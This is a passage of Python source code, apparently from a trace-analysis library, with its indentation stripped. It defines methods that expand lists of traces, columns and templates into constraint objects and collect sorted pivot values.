self._max_len = max(self._lens)
self._pivot = pivot
self._filters = filters
self._constraints = []
self._trace_expanded = False
self._expand()
if zip_constraints:
self._populate_zip_constraints()
else:
self._populate_constraints()
def _expand(self):
"""This is really important. We need to
meet the following criteria for constraint
expansion:
::
Len[traces] == Len[columns] == Len[templates]
Or:
::
Permute(
Len[traces] = 1
Len[columns] = 1
Len[templates] != 1
)
Permute(
Len[traces] = 1
Len[columns] != 1
Len[templates] != 1
)
"""
min_len = min(self._lens)
max_pos_comp = [
i for i,
j in enumerate(
self._lens) if j != self._max_len]
if self._max_len == 1 and min_len != 1:
raise RuntimeError("Essential Arg Missing")
if self._max_len > 1:
# Are they all equal?
if len(set(self._lens)) == 1:
return
if min_len > 1:
raise RuntimeError("Cannot Expand a list of Constraints")
for val in max_pos_comp:
if val == 0:
self._trace_expanded = True
self._ip_vec[val] = normalize_list(self._max_len,
self._ip_vec[val])
def _populate_constraints(self):
"""Populate the constraints creating one for each column in
each trace
In a multi-trace, multicolumn scenario, constraints are created for
all the columns in each of the traces. _populate_constraints()
creates one constraint for the first trace and first column, the
next for the second trace and second column,... This function
creates a constraint for every combination of traces and columns
possible.
"""
for trace_idx, trace in enumerate(self._ip_vec[0]):
for col in self._ip_vec[1]:
template = self._ip_vec[2][trace_idx]
constraint = Constraint(trace, self._pivot, col, template,
trace_idx, self._filters)
self._constraints.append(constraint)
def get_column_index(self, constraint):
return self._ip_vec[1].index(constraint.column)
def _populate_zip_constraints(self):
"""Populate the expanded constraints
In a multitrace, multicolumn scenario, create constraints for
the first trace and the first column, second trace and second
column,... that is, as if you run zip(traces, columns)
"""
for idx in range(self._max_len):
if self._trace_expanded:
trace_idx = 0
else:
trace_idx = idx
trace = self._ip_vec[0][idx]
col = self._ip_vec[1][idx]
template = self._ip_vec[2][idx]
self._constraints.append(
Constraint(trace, self._pivot, col, template, trace_idx,
self._filters))
def generate_pivots(self, permute=False):
"""Return a union of the pivot values
:param permute: Permute the Traces and Columns
:type permute: bool
"""
pivot_vals = []
for constraint in self._constraints:
pivot_vals += constraint.result.keys()
p_list = list(set(pivot_vals))
traces = range(self._lens[0])
try:
sorted_plist = sorted(p_list, key=int)
except (ValueError, TypeError):
try:
sorted_plist = sorted(p_list, key=lambda x: int(x, 16))
except (ValueError, TypeError):
sorted_plist = sorted(p_list)
if permute:
pivot_gen = ((trace_idx, pivot) for trace_idx in traces for pivot in sorted_plist)
return pivot_gen, len(sorted_plist) * self._lens[0]
else:
return sorted_plist, len(sorted_plist)
def constraint_labels(self):
"""
:return: string to represent the
set of Constraints
"""
return map(str, self._constraints)
def __len__(self):
return len(self._constraints)
def __iter__(self):
return iter(self._constraints)
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.